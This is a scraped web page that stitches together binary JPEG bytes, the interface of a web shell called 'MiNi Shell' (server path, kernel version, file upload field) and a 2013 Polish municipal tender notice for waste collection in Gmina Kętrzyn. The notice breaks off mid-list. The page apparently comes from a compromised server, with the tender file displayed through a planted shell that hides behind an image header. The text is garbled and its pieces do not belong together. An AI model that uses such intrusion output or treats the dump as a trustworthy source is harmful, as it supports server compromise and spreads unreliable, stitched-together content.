JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130422/157626-N-2013.html

<p class="kh_header"><b>Kętrzyn: ODBIÓR I ZAGOSPODAROWANIE ODPADÓW  KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH NA TERENIE GMINY KĘTRZYN.</b><br>
<b>Numer ogłoszenia: 157626 - 2013; data zamieszczenia: 22.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kętrzyn , ul. Kościuszki 2, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7512474 w. 17, faks 089 7512746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaketrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE ODPADÓW  KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH NA TERENIE GMINY KĘTRZYN..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest odbieranie i zagospodarowanie wskazanych w opisie zamówienia odpadów komunalnych z nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie gminy Kętrzyn, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami, ograniczenie odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz w sposób zgodny z przepisami prawa, a w szczególności przepisami:
- ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2012 r. poz. 391, z późn. zm.),
- ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21), 
Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2012r., w sprawie szczególnych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013r., poz. 122),
oraz zapisami :
- Wojewódzkiego Planu Gospodarki Odpadami na lata 2011 - 2016 , 
- Regulaminu utrzymania czystości i porządku na terenie gminy Kętrzyn.
 
2. Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno- prawnych związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.

3. Wykonawca zobowiązany będzie w szczególności do :

1) odbioru wszystkich odpadów komunalnych wytworzonych na terenie wszystkich zamieszkałych nieruchomości na terenie Gminy Kętrzyn, łącznie z zabudową kolonijną oraz utworzenia  punktu selektywnego zbierania odpadów;

2) ważenia wszystkich odebranych odpadów komunalnych ;

3) utrzymania właściwego stanu sanitarnego i technicznego pojazdów, urządzeń 
i pojemników; pojazdy muszą być zabezpieczone przez niekontrolowanym wydostawaniem się na zewnątrz odpadów podczas ich załadunku, transportu, przeładunku; pojazdy, urządzenia i pojemniki muszą być poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego;

4) przekazywania odpadów do uprawnionego przedsiębiorcy wykonującego działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych i uzyskania od niego potwierdzenia odbioru odpadów zebranych z terenu Gminy Kętrzyn na karcie przekazania odpadów;

5) prowadzenia dokumentacji w zakresie sprawozdawczości i przekazania Zamawiającemu do końca miesiąca po kwartale, którego dotyczą, kwartalnych sprawozdań zawierających :
-informacje o masie poszczególnych rodzajów odebranych odpadów komunalnych oraz sposobie ich zagospodarowania, wraz ze wskazaniem instalacji, do której zostały przekazane odebrane od właścicieli nieruchomości zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania;
- informacje o masie odpadów komunalnych ulegających biodegradacji:
a)przekazanych do składowania na składowisku odpadów,
b)nieprzekazanych do składowania na składowisku odpadów i sposobie ich
   zagospodarowania;
-liczbę właścicieli nieruchomości, od których zostały odebrane odpady komunalne;
- wskazanie właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób
  niezgodny z regulaminem;
podstawą do sporządzenia sprawozdań jest prowadzona przez wykonawcę ewidencja w zakresie odbierania od właścicieli nieruchomości odpadów komunalnych i przekazywania ich do instalacji, w tym karty przekazania odpadów;

6)  monitorowania obowiązku ciążącego na właścicielu nieruchomości w zakresie selektywnego zbierania odpadów komunalnych; w przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku w zakresie segregacji odpadów, Wykonawca odbiera odpady jako zmieszane odpady komunalne oraz sporządza na tą okoliczność informację np. oświadczenie, dokumentację fotograficzną w celu wydania przez Zamawiającego decyzji administracyjnej o zmianie wysokości opłaty; dokumentację tę Wykonawca przekazuje Zamawiającemu w okresach miesięcznych;

7)  przekazywania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej lub zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu ;

8) przekazywania, odebranych od właścicieli nieruchomości, selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r.
o odpadach (Dz.U.2013.21) ;

9) osiągnięcia poziomów odzysku odpadów komunalnych z uwzględnieniem poziomów odzysku wskazanych w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( Dz. U z 2012r., poz. 391), Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U z 2012r., poz. 645) oraz Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U z 2012r. Poz. 676);

4. Odbiór odpadów.
4.1 Obowiązywać będzie system mieszany zbiórki odpadów komunalnych, tj. workowo - pojemnikowy, zgodnie z zapisami  SIWZ. Worki i pojemniki dostarczy właścicielom nieruchomości Wykonawca  zamówienia. Worki i pojemniki powinny być oznakowane w sposób jednoznacznie wskazujący przeznaczenie na odpady określonego rodzaju. Pojemniki stanowią własność Wykonawcy, worki zostaną przekazane nieodpłatnie
wytwórcom odpadów.

4.2 Miejsce odbioru odpadów przez Wykonawcę:
- zabudowa jednorodzinna i zagrodowa - nieruchomość wytwórcy odpadu,
- zabudowa wielorodzinna - zbiorcze punkty zbiórki odpadów (tzw. gniazda), wyposażone przez Wykonawcę w pojemniki na odpady zmieszane i zbierane selektywnie,
- punkt selektywnego zbierania odpadów komunalnych, utworzony przez Wykonawcę,
   zgodnie z pkt 4.5 SIWZ.

4.3 Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki wytwórcom odpadów dostarczy Wykonawca zamówienia. Wielkość pojemników : od 110 litrów do 1100 litrów oraz od 7 m3 do 16 m3. Wielkość i ilość pojemników musi być dostosowana do ilości odpadów powstających na nieruchomości.
Częstotliwość załadunku i wywozu -1 raz w tygodniu.

4.4 Selektywna zbiórka odpadów komunalnych będzie się odbywać w systemie workowym w zabudowie jednorodzinnej i zagrodowej oraz pojemnikowym (gniazda) w zabudowie wielorodzinnej.
4.4.1 Rodzaje pojemników :
- żółty - do gromadzenia odpadów z tworzyw sztucznych, opakowań  wielomateriałowych i metalu,
- niebieski - do gromadzenia odpadów z papieru i tektury, 
- brązowy - do gromadzenia odpadów zielonych i biodegradowalnych,
- zielony (biały) - do gromadzenia odpadów szklanych.
Wielkość pojemników : od 110 litrów do 1100 litrów oraz od 1,5 m3 do 3,2 m3.

4.4.2 Rodzaje worków :
- żółty - do gromadzenia odpadów z tworzyw sztucznych, opakowań  wielomateriałowych i metalu,
- niebieski - do gromadzenia odpadów z papieru i tektury, 
- brązowy - do gromadzenia odpadów zielonych i biodegradowalnych,
Wielkość worków : co najmniej 60 litrów.

Wykonawca nie może mieszać ze sobą poszczególnych frakcji selektywnie zebranych odpadów komunalnych.
Worki i pojemniki dostarczy, wytwórcom odpadów, Wykonawca  zamówienia. 
Ilość i wielkość worków i pojemników musi być dostosowana do ilości odpadów powstających na nieruchomości.
Częstotliwość załadunku i wywozu -  raz na dwa tygodnie, dla każdego rodzaju (koloru) worka lub pojemnika.

Szacunkowa liczba worków na odpady zbierane selektywnie z gospodarstw domowych  12 000 szt./miesiąc z tolerancją 30%. 

4.4.3 Odbiór zużytego sprzętu elektrycznego i elektronicznego,  baterii i akumulatorów realizowany będzie przez Wykonawcę poprzez odbieranie wystawionych odpadów przez właścicieli przed swoimi nieruchomościami, w ustalonych przez Zamawiającego z Wykonawcą terminach.
Częstotliwość załadunku i wywozu tych odpadów-  dwa razy w roku w okresie 
od 1 marca do 30 listopada.

4.5 W ramach wynagrodzenia za realizację niniejszego zamówienia Wykonawca w terminie 60 dni od zawarcia umowy uruchomi na terenie Gminy Kętrzyn lub  Miasta Kętrzyn punkt selektywnego zbierania odpadów komunalnych, z godzinami pracy 7.00-15.00 od poniedziałku do piątku. Punkt powinien być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym. 
Miejsca magazynowania selektywnie zebranych odpadów komunalnych powinny być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniami czynników atmosferycznych. 
W punkcie selektywnego zbierania odpadów komunalnych odbierane będą: 
a) odpady zielone i ulegające biodegradacji, 
b) chemikalia, przeterminowane leki,
c) zużyte baterie i akumulatory,
d) zużyte opony,
e) odpady budowlane i rozbiórkowe,
f) popiół.
g) odpady wielkogabarytowe, w tym meble,
h) zużyty sprzęt elektryczny i elektroniczny,
i)  metale,
j) papier,
k) tworzywa sztuczne,
l) szkło.
Mieszkańcy z terenu Gminy Kętrzyn będą mogli na własny koszt dowieźć odpady do punktu selektywnego zbierania odpadów komunalnych i przekazać je nieodpłatnie.

4.6  Po podpisaniu umowy Zamawiający dostarczy Wykonawcy szczegółowy wykaz adresów nieruchomości objętych umową odbioru odpadów wraz z informacją o segregacji odpadów oraz miejsc, w których zlokalizowane będą   zbiorcze punkty zbiórki odpadów (tzw. gniazda). Zamawiający zastrzega sobie prawo zmiany liczby zbiorczych punktów zbiórki odpadów (tzw. gniazd) maksymalnie o 20 % w stosunku do ich liczby podanej w załączniku Nr 1 do SIWZ. Wykonawca zobowiązany jest niezwłocznie sporządzić i uzgodnić z zamawiającym harmonogram (w formie papierowej i elektronicznej) odbioru odpadów oraz uzgodnić z zamawiającym sposób dystrybucji worków na odpady zbierane selektywnie.

5.  Wielkość zamówienia.

5.1 Szacunkowe dane określające wielkość przedmiotu zamówienia zawarte są 
w załączniku Nr 1 do  SIWZ.

5.2 Łączna szacunkowa ilość odpadów objętych zamówieniem, dla liczby osób określonej w załączniku Nr 1 do SIWZ -  1300 ton.
         
5.3 Na wniosek zamawiającego Wykonawca będzie zobowiązany odbierać odpady również z  nieruchomości zamieszkałych, nie ujętych w załączniku Nr 1 do SIWZ.
Zamawiający zastrzega sobie prawo zmniejszenia liczby nieruchomości zamieszkałych,
z których odbierane będą odpady.
      Powyższe zmiany zakresu zamówienia nie przekroczą 30 % ogólnej liczby gospodarstw domowych określonej w załączniku Nr 1 do  SIWZ.
   

6. Za każdy miesiąc realizacji zamówienia Wykonawca otrzyma wynagrodzenie ryczałtowe, wypłacane przez zamawiającego po upływie okresu rozliczeniowego, tj. miesiąca. Wysokość miesięcznego wynagrodzenia Wykonawcy będzie zgodna z ofertą wykonawcy.
W przypadku zmiany liczby osób objętych odbiorem odpadów o więcej niż 5% w stosunku do wykazanej w załączniku Nr 1 do SIWZ, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę równą iloczynowi stawki ryczałtowej za odbiór odpadów wytworzonych przez 1 osobę (wg oferty) oraz liczby osób będącej różnicą pomiędzy liczbą osób ustalaną na bieżąco przez zamawiającego na podstawie złożonych deklaracji i liczbą osób wykazaną w załączniku Nr 1 do SIWZ. 
Zmiana wynagrodzenia Wykonawcy wchodzi w życie od pierwszego dnia miesiąca następującego po dniu przekazania Wykonawcy przez zamawiającego  informacji o zmianie liczby osób o wymagany próg (5%).
Zamawiający zapłaci wynagrodzenie Wykonawcy w terminie 14 dni od otrzymania faktury.

7. Wspólny Słownik Zamówień (CPV): 

90.50.00.00-2 Usługi związane z odpadami 
90.51.40.00-3 Usługi recyklingu odpadów 
90.51.10.00-2 Usługi wywozu odpadów 
90.51.20.00-9 Usługi transportu odpadów 
90.51.31.00-7 Usługi wywozu odpadów pochodzących z gospodarstw domowych 
90.53.30.00-2 Usługi gospodarki odpadami.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.40.00-3, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli :
 z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek oraz Wykonawca wykaże, że posiada: 
a)  wpis    do    rejestru    podmiotów    zbierających    zużyty    sprzęt    elektryczny    i elektroniczny, prowadzonego przez Głównego Inspektora Ochrony Środowiska; 
b)  wpis   do   rejestru   działalności   regulowanej   w   zakresie   odbierania   odpadów komunalnych od właścicieli nieruchomości z terenu  Gminy Kętrzyn.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli:
 z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek i  Wykonawca   wykaże,   że   realizuje   lub 
zrealizował w okresie trzech ostatnich lat przed upływem terminu do składania ofert, 
a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  -  w  tym  okresie,  przynajmniej jedną usługę polegającą na odbiorze  i zagospodarowaniu  odpadów komunalnych od właścicieli  nieruchomości  o wartości  co najmniej  200 000,- PLN;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli:
 z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek oraz  wykonawca wykaże, że dysponuje: 
a) co najmniej 2 pojazdami przystosowanymi do odbierania zmieszanych odpadów    
komunalnych, w tym pojazdem o ładowności do 2,5 t do zbiórki odpadów z zabudowy
kolonijnej;
b) co najmniej 2 pojazdami przystosowanymi do odbierania selektywnie zebranych 
odpadów komunalnych, w tym pojazdem o ładowności do 2,5 t do zbiórki odpadów z zabudowy kolonijnej;
c) co najmniej 1 pojazdem do odbierania odpadów bez funkcji kompaktującej,               
d)  bazą  magazynowo  -  transportową  usytuowaną    w  Gminie  Kętrzyn,  lub  w 
odległości  nie większej niż 60 km od granicy Gminy Kętrzyn, na terenie, do którego 
posiada tytuł prawny;  

wymienione pojazdy oraz baza magazynowo - transportowa muszą spełniać warunki 
określone  w  Rozporządzeniu  Ministra  Środowiska  z  dnia  11  stycznia  2013r.  w 
sprawie  szczegółowych  wymagań  w  zakresie  odbierania  odpadów  komunalnych  od właścicieli  nieruchomości  (Dz.  U.  z  2013r.  Poz.  122).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli: 
z oświadczenia o spełnieniu warunków art. 22 ust. 1, będzie wynikało że wykonawca
spełnia przedmiotowy warunek;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli: 
-  z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek oraz wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż  200 000,- zł ( dwieście tysięcy zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, w myśl art. 26 ust. 2b ustawy, może polegać na  wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu :
- dokumenty dotyczące:
   a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
   b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy
       wykonywaniu zamówienia,
   c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
